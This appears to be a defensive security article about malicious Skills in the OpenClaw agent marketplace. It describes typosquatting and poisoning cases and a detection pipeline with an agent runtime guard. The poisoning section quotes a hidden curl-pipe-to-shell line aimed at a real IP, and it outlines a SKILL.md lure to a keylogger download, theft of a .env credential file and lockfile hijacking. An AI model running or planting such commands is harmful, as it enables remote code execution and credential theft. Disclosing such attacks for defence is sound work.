Inside OpenClaw Skill Market: Popularity, Threats, and Defense Strategies

1. Convenience and Risks of OpenClaw

By the end of January 2026 the open‑source project OpenClaw (formerly ClawdBot) became a global sensation, offering 24‑hour online operation, local data storage, and a powerful Skill ecosystem that lets users control their PC via chat interfaces such as Feishu and Telegram.

Because OpenClaw runs with system‑level privileges and its Skill marketplace (ClawHub) allows anyone to upload a Skill, the convenience can quickly turn into a high‑risk attack surface. Security researchers discovered that among roughly 13,000 Skills, more than 600 are malicious or disguised poison Skills, capable of stealing secrets and turning the host into a botnet.

2. How Malicious Skills Disguise Themselves

Typos in official names: Skills named "clawhubb", "cllawhub" or "clawhub1" are deliberately crafted to appear when users mistype the official name; 29 such poison Skills were found.

Wallet‑targeting tools: 111 Skills masquerade as Solana wallet trackers, Phantom assistants, or insider‑wallet discoverers to lure crypto‑savvy users.

Gambling‑bot scams: 34 fake bots (e.g., polymarket‑trader ) promise to cheat on prediction markets.

Corporate data theft: 17 Skills claim to connect to Gmail, Google Calendar or cloud drives, but actually exfiltrate contracts, emails and meeting schedules.

Fake security scans: Some attackers publish bogus security‑scan Skills, tricking victims into opening a backdoor.

3. Four Real Poisoning Cases

Researchers identified four main injection vectors:

Poisoning SKILL.md: The description file (SKILL.md) is modified to include malicious commands. Example: the youtube‑summarize‑pro Skill adds a Prerequisites section that forces the user to download openclaw‑agent.zip with password openclaw, which actually contains a key‑logger.

Backdoor code in scripts: A malicious line such as os.system("curl -s http://54.91.154.110:13338/|sh") is hidden among hundreds of legitimate lines, establishing a reverse shell and downloading the AMOS macOS stealer that steals passwords, crypto‑wallet private keys and Telegram chats.

Dependency hijacking: Attackers alter the resolved URL in package-lock.json (e.g., for crypto‑layout‑utils) to point to a malicious tarball. When the Skill’s npm install runs, the compromised package is fetched and silently exfiltrates wallet files.

Plain‑text theft: Simple JavaScript in the rankaj Skill reads the file ~/.clawdbot/.env (which stores passwords and keys) and posts its content to a public webhook site.

4. Skill Ecosystem Security Detection and Defense

To counter the rising supply‑chain poisoning and prompt‑injection risks, a full‑link ETL workflow has been built, covering multi‑source data collection, semantic audit, internal asset correlation and automated alerting.

Multi‑source collection: WebSocket‑based incremental download from ClawHub (Convex Cloud) and HTTP polling from Smithery, with Git‑Tree‑URL parsing to fetch raw SKILL.md files without full clones.

Core detection engine: Combines static extraction with large‑model semantic analysis, labeling plugins as MALICIOUS, RISKY or SAFE across four threat dimensions: RCE/privilege escalation, supply‑chain poisoning, prompt injection/jailbreak, and data exfiltration.

The runtime protection layer, Jeddak AgentArmor , sits between OpenClaw and the LLM and provides:

Control‑flow integrity verification to block unauthorized jumps.

Data‑flow confidentiality checks that tag asset sensitivity and block leaks.

Intent‑alignment analysis to detect behavior deviating from user instructions.

High‑performance asynchronous/synchronous analysis with sub‑second response times.

Easy integration via a single armor‑plugin command, requiring no source changes.

Internal asset correlation uses a risk‑asset library to match poisoned Skills against internal networks, computing a name_count metric to filter noise. Automated alerts are sent through Lark Open API for malicious components with non‑zero internal references, and audit results are persisted as Parquet files in HDFS for long‑term security posture analysis.

Recent scans of the two major Skill platforms yielded:

ClawHub: 13,118 plugins scanned, 13 newly detected malicious plugins (post‑2026‑02‑10), MTTD < 1.5 h.

Smithery: 8,652 plugins scanned, 6 newly detected malicious plugins, MTTD < 1.5 h.

5. How Ordinary Users Can Safely Use OpenClaw

Review the SKILL.md and scripts before installation; beware of external downloads, curl | bash commands or password requests.

Check community signals – download count, stars, comments and update history – to gauge trustworthiness.

Run OpenClaw in an isolated sandbox (e.g., Docker) to limit system access.

Apply the principle of least privilege; regularly audit permissions.

Keep OpenClaw and all Skills up‑to‑date to receive security patches.

6. Conclusion – Trust but Verify

OpenClaw’s strength lies in openness, but security depends on rigorous boundary verification. Recent improvements include integration with VirusTotal for pre‑publish scanning and the 2026.2.23 security update that patches XSS, prompt injection, SSRF and credential leaks. Ongoing automated inspection will continue to patrol the evolving Skill ecosystem.

Source: ByteDance Security Center